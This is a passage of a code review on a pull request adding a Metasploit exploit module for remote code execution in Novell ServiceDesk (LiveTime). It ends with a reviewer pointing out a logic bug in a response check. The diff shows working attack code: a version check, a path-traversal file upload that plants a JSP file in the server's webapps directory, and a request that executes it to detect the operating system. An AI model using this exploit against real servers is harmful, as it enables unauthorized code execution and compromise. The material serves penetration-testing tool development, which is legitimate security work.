modules/exploits/multi/http/novell_servicedesk_rce.rb

```diff
@@ -0,0 +1,384 @@
+      'uri'    => normalize_uri('LiveTime','WebObjects','LiveTime.woa'),
+      'method' => 'GET',
+      'headers' => {
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+      }
+    })
+
+    if res && res.code == 200 && res.body.to_s =~ /\<p class\=\"login-version-title\"\>\Version \#([0-9\.]+)\<\/p\>/
+      return $1.to_f
+    else
+      return 999
+    end
+  end
+
+
+  def check
+    version = get_version
+    if version <= 7.1 && version >= 6.5
+      return Exploit::CheckCode::Appears
+    elsif version > 7.1
+      return Exploit::CheckCode::Safe
+    else
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def pick_target
+    return target if target.name != 'Automatic'
+
+    print_status("#{peer} - Determining target")
+
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+
+    traversal_paths = []
+    if datastore['TRAVERSAL_PATH']
+      traversal_paths << datastore['TRAVERSAL_PATH']    # add user specified or default Virtual Appliance path
+    end
+
+    # add Virtual Appliance path plus the traversal in a Windows or Linux self install
+    traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/'])
+
+    # test each path to determine OS (and correct path)
+    traversal_paths.each do |traversal_path|
+      jsp_name = upload_jsp(traversal_path, os_finder_payload)
+
+      res = send_request_cgi({
+        'uri'    => normalize_uri('LiveTime', jsp_name),
+        'method' => 'GET',
+        'headers' => {
+          'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+        },
+        'cookie' => @cookies
+      })
+
+      if res && res.code == 200
+        if res.body.to_s =~ /Windows/
+          @my_target = targets[2]
+        else
+          # Linux here
+          @my_target = targets[1]
+        end
+        if traversal_path.include? '/srv/tomcat6/webapps/'
+          register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name)
+        else
+          register_files_for_cleanup('../webapps/LiveTime/' + jsp_name)
+        end
+        return traversal_path
+      end
+    end
+
+    return nil
+  end
+
+
+  def upload_jsp(traversal_path, jsp)
+    jsp_name  = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"")
+    data = post_data.to_s
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(@upload_url),
+      'headers' => {
+        'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)',
+      },
+      'cookie' => @cookies,
+      'data'   => data,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+
+    if not res && res.code == 200
```

Comment:
Shouldn't this ```&&``` be ```||```? Because if no res then there is no way we will have res.code.